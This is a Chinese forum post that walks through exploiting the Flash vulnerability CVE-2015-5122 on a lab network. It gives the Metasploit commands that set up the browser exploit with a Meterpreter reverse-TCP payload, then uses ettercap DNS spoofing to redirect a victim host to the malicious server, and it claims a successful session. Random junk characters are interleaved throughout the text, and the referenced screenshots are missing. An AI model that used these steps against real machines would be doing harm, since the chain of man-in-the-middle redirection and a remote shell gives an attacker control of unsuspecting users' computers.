找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1897|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 _7 j s- i* C6 p% g 二、cve2015-5122漏洞实例演示虚拟机 # _) {. v u2 [

a( n+ l. ^" N( k

7 r! ^0 b+ w$ [3 f+ c( g   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 9 v" R+ n; s$ l5 V

( T* j+ V1 e, V" v

- W* j; a: F5 }8 K7 }: K search cve-2015-5122如图: ) [+ k4 a/ g9 E! E! p; i$ u6 g0 s

4 l" W- B1 j7 |8 M- E/ P3 d

# `# Y( m1 b! Z ~+ x3 r* w   , P! g* H N5 K

- N; A) A% ? c3 u. a

) M/ ^: S% Z% H% B5 c 下面我们敲如下命令: - i$ f2 v# q9 t+ T9 s4 a8 D9 J; f

) E) T4 p. ~5 ` m7 b

8 A9 J2 c! @ }6 o. Y* n/ _9 W( K5 q use exploit/multi/browser/adobe_flash_opaque_background_uaf O% k1 Z7 p- R

9 g& l* e0 \' v: R* D. F

* S% c; i( `3 a, l; R) C. S set PAYLOAD windows/meterpreter/reverse_tcp 3 @/ Y/ e' X% I0 C! b; p! e

" d% Z# A6 \! r) r! P

" @, l: d- Y. i* z* D set LHOST 192.168.0.109 . ?* Q; N! _( z2 S8 J% T

. g1 j# p% Y5 `, \, y! q

2 o' |4 u1 P" a set URIPATH /                        /*根目录*/ / P- f5 S! n% Q

, l% Z* B6 A$ H# Z2 D7 m. g9 M Y8 \

( z+ G/ }5 q4 \# X5 v set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 % W; \8 G) t2 l

1 {' \9 B+ k( G7 W( K g# c

# Q. }0 ^3 g: F0 F& `) u0 r set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! q1 f: n/ Q1 S+ v

1 o- Y8 ~. K2 V* `+ M( m# B

- N1 w0 v" i2 _6 m8 N 然后show options如图: . D: x2 m' e6 L& q9 F" t2 m

, q z( G% G: j. B4 v

; E, t7 P: E8 D5 l& I9 s5 [7 ]) Q   ( @. n k6 B" b

: \7 }1 {, f) B9 ?( Y! d2 H: q2 G

O. |1 Y+ w/ X 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
V& A+ E6 f s4 B! l
* H: P4 T' f& a9 A; P, R

5 z) o1 C/ g6 `( K# n1 }9 J

3 A) T T3 ~7 \- \ 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 & ?3 N% ~* C4 A9 a. Q% l: W

1 c) z" h( e0 |% R" I) d# Y

1 S& @* y4 H) V: O Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 4 C: s+ `7 |# i# {6 G

9 d. l. O; a3 O6 g- _) l

4 V* r9 z5 {8 `- q( e' y   9 _+ f% }+ @& ?+ D

* P3 h6 m8 l8 x# T( Y6 u; C

* y1 `! m; N/ a6 ] 成功了,这时候我们断开ettercap,如图: ; q' @) ^( i( w" m {6 x

/ q) ?& E6 g. g7 z- ?+ a @4 [

z2 G; t9 \7 M+ P8 H9 \; [   ' h: w$ b' t; Y- T, W

3 @( B; f8 k/ W! _- a: T$ w4 [

" T7 i# s0 o3 k Screenshot如图: ) Q D' j% |. q( T8 K

) L. a$ a* h1 _% p

3 |+ I& M7 G5 w- Z   * B( `8 _# f2 w

8 y/ B% m g8 m8 @8 ~

" P# e/ C$ G3 ]6 P: m* |* e" s 5 x7 u6 v j' z# @0 I$ n" w

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表